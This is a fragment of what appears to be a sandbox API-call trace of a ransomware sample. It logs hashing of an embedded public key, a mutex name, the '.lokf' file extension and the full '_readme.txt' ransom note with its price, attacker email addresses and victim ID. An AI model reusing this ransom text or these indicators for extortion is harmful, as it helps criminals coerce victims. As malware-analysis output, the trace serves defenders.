returned 1 [0144.501] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x11) returned 0x727848 [0144.502] CryptGetHashParam (in: hHash=0x70f698, dwParam=0x2, pbData=0x727848, pdwDataLen=0x18d808, dwFlags=0x0 | out: pbData=0x727848, pdwDataLen=0x18d808) returned 1 [0144.502] GetLastError () returned 0x0 [0144.502] CryptDestroyHash (hHash=0x70f698) returned 1 [0144.502] CryptReleaseContext (hProv=0x741978, dwFlags=0x0) returned 1 [0144.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f4130 | out: hHeap=0x6e0000) returned 1 [0144.502] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x322e270 [0144.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x74ab90 | out: hHeap=0x6e0000) returned 1 [0144.502] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x70d0b0 | out: hHeap=0x6e0000) returned 1 [0144.502] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x368) returned 0x5ac [0144.718] WaitForSingleObject (hHandle=0x5ac, dwMilliseconds=0xffffffff) returned 0x0 [0145.370] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x5bc [0145.370] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x28) returned 0x322d778 [0145.370] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31f9f30 [0145.370] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fa198 [0145.370] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fa400 [0145.371] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fa668 [0145.371] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fa8d0 [0145.371] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fab38 [0145.371] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fada0 [0145.371] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fb008 [0145.371] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fb270 [0145.371] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fb4d8 [0145.371] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x3e0) returned 0x74eea8 [0145.371] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x5ed) returned 0x3212f10 [0145.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x3212f10, cbMultiByte=1517, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 494 [0145.371] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x5f0) returned 0x3213508 [0145.371] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3212f10 | out: hHeap=0x6e0000) returned 1 [0145.371] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x74eea8 | out: hHeap=0x6e0000) returned 1 [0145.371] CryptAcquireContextW (in: phProv=0x18d874, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18d874*=0x741a00) returned 1 [0145.372] CryptCreateHash (in: hProv=0x741a00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18d878 | out: phHash=0x18d878) returned 1 [0145.372] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0145.372] CryptHashData (hHash=0x3220cd8, pbData=0x3213508, dwDataLen=0x1ed, dwFlags=0x0) returned 1 [0145.372] CryptGetHashParam (in: hHash=0x3220cd8, dwParam=0x2, pbData=0x0, pdwDataLen=0x18d87c, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18d87c) returned 1 [0145.372] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x11) returned 0x727888 [0145.372] CryptGetHashParam (in: hHash=0x3220cd8, dwParam=0x2, pbData=0x727888, pdwDataLen=0x18d87c, dwFlags=0x0 | out: pbData=0x727888, pdwDataLen=0x18d87c) returned 1 [0145.372] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x34) returned 0x3220c58 [0145.372] GetLastError () returned 0x0 [0145.372] lstrcatA (in: lpString1="", lpString2="E1" | out: lpString1="E1") returned="E1" [0145.372] GetLastError () returned 0x0 [0145.372] lstrcatA (in: lpString1="E1", lpString2="76" | out: lpString1="E176") returned="E176" [0145.372] GetLastError () returned 0x0 [0145.372] lstrcatA (in: lpString1="E176", lpString2="D9" | out: lpString1="E176D9") returned="E176D9" [0145.372] GetLastError () returned 0x0 [0145.372] lstrcatA (in: lpString1="E176D9", lpString2="3B" | out: lpString1="E176D93B") returned="E176D93B" [0145.372] GetLastError () returned 0x0 [0145.372] lstrcatA (in: lpString1="E176D93B", lpString2="C4" | out: lpString1="E176D93BC4") returned="E176D93BC4" [0145.372] GetLastError () returned 0x0 [0145.372] lstrcatA (in: lpString1="E176D93BC4", lpString2="5F" | out: lpString1="E176D93BC45F") returned="E176D93BC45F" [0145.372] GetLastError () returned 0x0 [0145.372] lstrcatA (in: lpString1="E176D93BC45F", lpString2="7A" | out: lpString1="E176D93BC45F7A") returned="E176D93BC45F7A" [0145.372] GetLastError () returned 0x0 [0145.372] lstrcatA (in: lpString1="E176D93BC45F7A", lpString2="CA" | out: lpString1="E176D93BC45F7ACA") returned="E176D93BC45F7ACA" [0145.373] GetLastError () returned 0x0 [0145.373] lstrcatA (in: lpString1="E176D93BC45F7ACA", lpString2="83" | out: lpString1="E176D93BC45F7ACA83") returned="E176D93BC45F7ACA83" [0145.373] GetLastError () returned 0x0 [0145.373] lstrcatA (in: lpString1="E176D93BC45F7ACA83", lpString2="C3" | out: lpString1="E176D93BC45F7ACA83C3") returned="E176D93BC45F7ACA83C3" [0145.373] GetLastError () returned 0x0 [0145.373] lstrcatA (in: lpString1="E176D93BC45F7ACA83C3", lpString2="B7" | out: lpString1="E176D93BC45F7ACA83C3B7") returned="E176D93BC45F7ACA83C3B7" [0145.373] GetLastError () returned 0x0 [0145.373] lstrcatA (in: lpString1="E176D93BC45F7ACA83C3B7", lpString2="95" | out: lpString1="E176D93BC45F7ACA83C3B795") returned="E176D93BC45F7ACA83C3B795" [0145.373] GetLastError () returned 0x0 [0145.373] lstrcatA (in: lpString1="E176D93BC45F7ACA83C3B795", lpString2="05" | out: lpString1="E176D93BC45F7ACA83C3B79505") returned="E176D93BC45F7ACA83C3B79505" [0145.373] GetLastError () returned 0x0 [0145.373] lstrcatA (in: lpString1="E176D93BC45F7ACA83C3B79505", lpString2="9E" | out: lpString1="E176D93BC45F7ACA83C3B795059E") returned="E176D93BC45F7ACA83C3B795059E" [0145.373] GetLastError () returned 0x0 [0145.373] lstrcatA (in: lpString1="E176D93BC45F7ACA83C3B795059E", lpString2="89" | out: lpString1="E176D93BC45F7ACA83C3B795059E89") returned="E176D93BC45F7ACA83C3B795059E89" [0145.373] GetLastError () returned 0x0 [0145.373] lstrcatA (in: lpString1="E176D93BC45F7ACA83C3B795059E89", lpString2="D3" | out: lpString1="E176D93BC45F7ACA83C3B795059E89D3") returned="E176D93BC45F7ACA83C3B795059E89D3" [0145.373] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x727888 | out: hHeap=0x6e0000) returned 1 [0145.373] CryptDestroyHash (hHash=0x3220cd8) returned 1 [0145.373] CryptReleaseContext (hProv=0x741a00, dwFlags=0x0) returned 1 [0145.373] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3213508 | out: hHeap=0x6e0000) returned 1 [0145.373] lstrlenA (lpString="E176D93BC45F7ACA83C3B795059E89D3") returned 32 [0145.373] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x3e0) returned 0x74eea8 [0145.373] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x5ed) returned 0x3212f10 [0145.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", cchWideChar=-1, lpMultiByteStr=0x3212f10, cbMultiByte=1517, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n", lpUsedDefaultChar=0x0) returned 494 [0145.373] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x5f0) returned 0x3213508 [0145.373] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3212f10 | out: hHeap=0x6e0000) returned 1 [0145.373] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x74eea8 | out: hHeap=0x6e0000) returned 1 [0145.373] lstrcpyA (in: lpString1=0x320b920, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n" [0145.373] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3213508 | out: hHeap=0x6e0000) returned 1 [0145.373] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbfd8 [0145.373] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x28) returned 0x322d8c8 [0145.373] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fb740 [0145.373] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fb9a8 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fbc10 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fbe78 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fc0e0 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fc348 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fc5b0 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fc818 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fca80 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fcce8 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x816) returned 0x3212f10 [0145.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d880, cbMultiByte=-1, lpWideCharStr=0x3212f10, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x3213730 [0145.374] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3212f10 | out: hHeap=0x6e0000) returned 1 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x28) returned 0x322d748 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fcf50 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x31fd1b8 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3220e58 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x32210c0 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3221328 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3221590 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x32217f8 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3221a60 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3221cc8 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3221f30 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xa0) returned 0x7597e8 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x130) returned 0x31d0ab8 [0145.374] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7597e8 | out: hHeap=0x6e0000) returned 1 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1d0) returned 0x74cf80 [0145.374] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31d0ab8 | out: hHeap=0x6e0000) returned 1 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x2b7) returned 0x743f30 [0145.374] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x74cf80 | out: hHeap=0x6e0000) returned 1 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x412) returned 0x74eea8 [0145.374] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x743f30 | out: hHeap=0x6e0000) returned 1 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x61a) returned 0x3212f10 [0145.374] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x74eea8 | out: hHeap=0x6e0000) returned 1 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x440) returned 0x74eea8 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x106a) returned 0x3203ad0 [0145.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x74eea8, cbMultiByte=-1, lpWideCharStr=0x3203ad0, cchWideChar=2101 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6s") returned 1078 [0145.374] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1070) returned 0x3204b48 [0145.375] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3203ad0 | out: hHeap=0x6e0000) returned 1 [0145.375] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x74eea8 | out: hHeap=0x6e0000) returned 1 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x28) returned 0x322d928 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3222198 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3222400 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3222668 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x32228d0 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3222b38 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3222da0 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3223008 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3223270 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x32234d8 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x25c) returned 0x3223740 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x80a) returned 0x3213f58 [0145.375] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18d880, cbMultiByte=-1, lpWideCharStr=0x3213f58, cchWideChar=1029 | out: lpWideCharStr=".lokf") returned 6 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x810) returned 0x3203ad0 [0145.375] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3213f58 | out: hHeap=0x6e0000) returned 1 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x31f4ba8 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x18) returned 0x7272e8 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322eef8 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x30) returned 0x74ab90 [0145.375] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7272e8 | out: hHeap=0x6e0000) returned 1 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbf70 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x48) returned 0x321fb68 [0145.375] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x74ab90 | out: hHeap=0x6e0000) returned 1 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f64d8 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbf08 [0145.375] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x321fb68 | out: hHeap=0x6e0000) returned 1 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322ef50 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x90) returned 0x31f94e0 [0145.375] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bbf08 | out: hHeap=0x6e0000) returned 1 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322efa8 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6520 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xd8) returned 0x7ca9c0 [0145.375] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f94e0 | out: hHeap=0x6e0000) returned 1 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x31f4bd0 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f000 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x60) returned 0x7bbf08 [0145.375] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x138) returned 0x31d0ab8 [0145.376] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7ca9c0 | out: hHeap=0x6e0000) returned 1 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f6640 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f058 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x50) returned 0x322f0b0 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x40) returned 0x31f65b0 [0145.376] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x1c8) returned 0x3213538 [0145.376] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31d0ab8 | out: hHeap=0x6e0000) returned 1 [0145.376] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f4ba8 | out: hHeap=0x6e0000) returned 1 [0145.376] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322eef8 | out: hHeap=0x6e0000) returned 1 [0145.376] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bbf70 | out: hHeap=0x6e0000) returned 1 [0145.376] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f64d8 | out: hHeap=0x6e0000) returned 1 [0145.376] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322ef50 | out: hHeap=0x6e0000) returned 1 [0145.376] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322efa8 | out: hHeap=0x6e0000) returned 1 [0145.376] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f6520 | out: hHeap=0x6e0000) returned 1 [0145.376] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x31f4bd0 | out: hHeap=0x6e0000) returned 1 [0145.376] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x322f000 | out: hHeap=0x6e0000) returned 1 [0145.376] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x7bbf08 | out: hHeap=0x6e0000) returned 1 [0145.376] HeapFree (in: 